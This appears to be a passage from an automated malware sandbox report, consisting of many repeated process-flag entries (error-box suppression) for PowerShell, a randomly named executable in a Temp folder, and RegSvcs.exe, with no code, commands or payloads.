            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
